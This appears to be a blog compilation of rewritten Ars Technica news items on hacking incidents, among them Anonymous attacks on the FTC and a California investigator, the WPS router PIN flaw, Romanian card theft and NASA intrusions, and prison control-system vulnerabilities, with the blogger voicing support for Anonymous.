Members of Anonymous’ “AntiSec” division attacked a Web server of the Federal Trade Commission’s Bureau of Consumer Protection, hacking into and defacing the sites hosted on it.

“The Bureau of Consumer Protection’s Business Center website and the partnership site NCPW run by the Federal Trade Commission were hacked earlier today,” FTC spokesperson Cecelia Prewett stated in an official statement. “The FTC takes these malicious acts seriously. The sites have been taken down and will be brought back up when we’re satisfied that any vulnerability has been addressed.”

A log of the hack was posted and went viral, which was a cut-and-paste from a shell session on the Red Hat Enterprise Linux server. This log shows the server’s directories, the user account names and encrypted passwords, and the MySQL databases running on the server.

The websites belong to the FTC, but they weren’t running in a government-owned data center. According to the IP address data for the server, it was hosted by Media Temple in Culver City, California. The sites were set up for the FTC by the public relations firm Fleishman-Hilliard. Media Temple CMO Kim Brubeck has stated that her company was unaware that Fleishman had intended to use the servers in its data center for .gov sites, and that she has requested they remove any additional .gov sites.

The attack by Anonymous was motivated by the FTC’s failure to step in to stop Google’s changes in its privacy policy, and by the US government’s support of ACTA. The member who posted the log threatened that “If ACTA is signed by all participating negotiating countries…We will systematically knock all evil corporations and governments off of our internet.” Since the United States is a free country and I am given the freedom of speech by the first amendment, I will admit that I totally support Anonymous and what they stand for.

Source: Ars Technica

A breach that has caused Cryptome.org to infect visitors with malware was one of at least six attacks reported to hit high-profile sites or services in the past few days. Other sites affected by these hackers included Ticketmaster, websites for Mexico and the state of Alabama, Dutch ISP KPN, and the Microsoft store in India.
 
Cryptome is basically a database of leaked documents and other information that concerns free speech, privacy and cryptography. This site was attacked by hackers who left code on its servers that attempted to infect any visitor using Windows PCs with a trojan spawned by the Blackhole Toolkit.
 

A flaw has been found in WiFi Protected Setup that indicates that most home and small business routers could be giving away free WiFi.

On December 27th, the Department of Homeland Security’s Computer Emergency Readiness Team (what a mouthful, or handful if you’re typing ) issued a warning about a vulnerability. This vulnerability was in wireless routers that use WPS, or WiFi Protected Setup, to allow new devices to be connected to them. Researchers at a Maryland-based computer security firm developed a tool that exploits that vulnerability just a day after the warning was issued, and went so far as to make a version available as open source.

WPS is designed for home and small business users of wireless networking so that they have the ability to easily configure devices without having to enter a long password. Basically, the process of authorization is done automatically as to save time. A lot of times, WPS-capable routers will use a personal identification number, which is printed on the router, to authenticate the device.

However, Stefan Veihbock, a security researcher, found out that the PIN implementation is susceptible to “brute-force” attacks because of the way routers respond to bad requests and the nature of the PIN itself. Saving you the trouble of exactly how it works, an attacker can get a PIN number within 11,000 guesses, and when done with a tool that does this “guessing” process over and over by itself, it becomes maybe an hour’s work. Veihbock demonstrated the vulnerability with a proof-of-concept tool he wrote in Python, available for download from his site.

Why is that bad? Well, if you have a WPS-enabled router, changing the password or service set identifier (SSID) won’t keep these attackers out, since they are already connected and can connect via your PIN, which cannot be changed. Hell, if you’re using multiple SSIDs with different passwords, the PIN can provide access to all of them.

The routers most vulnerable to these attacks—the ones without PIN features that stop the user after a number of bad requests, a.k.a. PIN Lockout features—include products from Cisco’s Linksys division, Belkin, Buffalo, Netgear, TP-Link, ZyXEL, and Technicolor. None of the vendors has issued a statement on the vulnerability, or replied to inquiries from Veihbock.

Source: Ars Technica

A band of Romanian hackers have been stealing credit card data from hundreds of small businesses, as well as more than 150 Subway restaurant franchises and at least 50 other small retailers. Using the point-of-sale (POS) systems, these businesses practically left their drawers open, so to speak, letting the hackers ring up over $3 million in fraudulent charges.

How many victims were there? Well, according to the US District Court of New Hampshire on December 8th, these hackers are alleged to have gathered the credit and debit card data from over 80,000 victims. “This is the crime of the future,” said Dave Marcus, director of security research and communications at McAfee Labs. The days of robbing with a gun are slowing, and criminals are resorting to targeting small businesses digitally.

While it may seem like hacking is very complex, the methods used by these hackers were actually unsophisticated. The systems that were attacked were discovered through a targeted port scan of blocks of IP addresses to detect systems with a specific type of remote desktop access software running on them. By doing this, the hackers could figure out which were POS systems, using the software to gain entry. The PCI Security Standards Council, which governs credit card and debit card payment systems security, requires two-factor authentication for remote access to POS systems, which the hacked retailers obviously didn’t have.

“With PCI compliance, those apps shouldn’t be on those systems,” said Konrad Fellmann, audit and compliance manager for SecureState, an IT security firm with a practice in retail security auditing. But small retailers who don’t store credit card data are not required to have the same level of auditing as larger companies, Fellmann said.

Subway is the main store in question, as the rest were primarily small businesses. Requirements were provided to the Subway franchises, but some of them “directly and blatantly disregarded” Subway’s security and POS configuration standards. “It’s not like they had to install something and they didn’t,” Schuman said. “They did it proactively,” he continued, “downloading low-cost remote desktop software from the Internet and refusing to use point-to-point encryption as Subway dictated.”

The Justice Department alleges that these hackers gained access to the remote desktop software by guessing or “cracking” the passwords. Fellmann isn’t surprised based on his previous experience with retailers. Weak passwords, such as “password” or “1234,” are one of the most common things he discovers during POS penetration testing. “Some people, you tell them what’s required, and they’d rather not do it. They had the tools, and could have easily blocked [the attack]. If they were using a validated POS application, the vendor should provide an implementation plan, which would have included making sure you have a firewall in place.” But, he said, “these people weren’t thinking about point of sale security – they were just thinking about making a sandwich.”

Source: Ars Technica

On Friday, Anonymous’ Operation AntiSec published the private e-mails of a California Department of Justice investigator. The hackers have posted the 38,000 e-mails in a Gmail account that appears to belong to Alfredo “Fred” Baclagan, a California Department of Justice special agent supervisor in charge of computer crime investigations. They published these to a hidden site on Tor, as well as to a torrent listed on The Pirate Bay. They have also included Baclagan’s personal address and phone number.

The effort by Anonymous is part of the attack on law enforcement as part of a response to their activities surrounding the Occupy Wall Street protests. It began as a protest by Anonymous and LulzSec against government monitoring and censorship of the Internet. While LulzSec has went into the dark again, Anonymous has kept going for years.

In a Twitter message, Anonymous said that their attacks on law enforcement also “has to do with FBI’s targeting of anons, re: imprisoned during opPayback and others.” Operation Payback included the DDoS attacks on Visa, Mastercard, and PayPal after they cut off contribution processing to WikiLeaks.

The e-mails posted by Anonymous include archives from the International Association of Computer Investigative Specialists’ private discussions, where they discussed computer forensic methods. There are also the reactions of IACIS members to a post of threads from the list to the Twitter account of Sabu, a well-known Anonymous hacker, and an e-mail from Baclagan’s hacked Google account rickrolling the entire list. The IACIS is down “for maintenance” because of the disclosures.

Anons also claimed to have listened to Baclagan’s personal voicemails and read his SMS logs, as well as his personal Google Voice account. They said they used the Google Voice account to text and call his friends and family.

“We lulzed as we listened to angry voicemails from his estranged wives and ex-girlfriends while also reading his conversations with girls who responded to his ‘man seeking woman’ craigslist ads,” the hackers wrote in their post.

Source: Ars Technica

A Romanian hacker, aged 26, has now been arrested for hacking computer systems at NASA. This news comes from the release from the Romanian Directorate for Investigating Organized Crime and Terrorism (DIICOT). Robert Butyka was this Romanian, and he is being charged with breaking into NASA servers starting in December of 2010.

For some reason, Romanians seem to target NASA. I don’t know if they’re looking for something, NASA is easy to hack, or they simply dislike NASA. Whatever the case may be, this is the 3rd time a Romanian has hacked NASA in a few years. There was Butyka,TinKode, Victor Faur. TinKode stole satellite data in May of 2011. Faur hacked NASA and US Navy sites in 2005 and 2006, where he was charged in 2008. Faur avoided going to jail, but ended up paying $238,000 to the United States in damages.

Romania is actually the one pressing charges against Butyka, as there is no extradition treaty between Romania and the United States. However, he did violate Romania’s anti-hacking laws, so that is why they are indeed pressing charges. DIICOT is stating that he has caused over $500,000 in damages to NASA systems through “introduction, modification and damage to computer data, and restricting access to data.”

Source: Ars Technica

There is quite the vulnerability in the computer systems used to control facilities at federal prisons. What seems to be straight from a movie, this exploit could allow an intelligent hacker to remotely take over the prison. The hacker would be able to open and overload cell door mechanisms as well as shut down the internal communications systems. Tiffany Rad, Teague Newman, and John Strauchs presented this exploit on October 26 at the Hacker Halted information security conference in Miami. These three people spent less than $2,500 and had no previous experience in dealing with prison technologies.

The Washington Times reported that the researchers delivered their findings to state and federal prison authorities. The Department of Homeland Security even confirmed their research. “We validated the researchers’ initial assertion… that they could remotely reprogram and manipulate [the ICS software and controllers],” Former National Cybersecurity and Communications Integration Center Director Sean P. McGurk, who left DHS in September, told the Washington Times.

Strauchs was called in by a warden to investigate an incident in which “all the cell doors on one prison’s death row spontaneously opened.” While the computers used to control the doors and systems should not be connected to the Internet, there is an Internet connection that was found associated with every prison system the researchers looked at. Sometimes, they were used to surf the Internet by staff. Other times, companies had installed the software to do remote maintenance on the systems. A flash drive attack could be used for those with no prison Internet connection.

“You could open every cell door, and the system would be telling the control room they are all closed,” Strauchs, a former CIA operations officer, told the Times. He said that he thought the greatest threat was that the system would “be used to create the conditions needed for the assassination of a target prisoner.”

Source: Ars Technica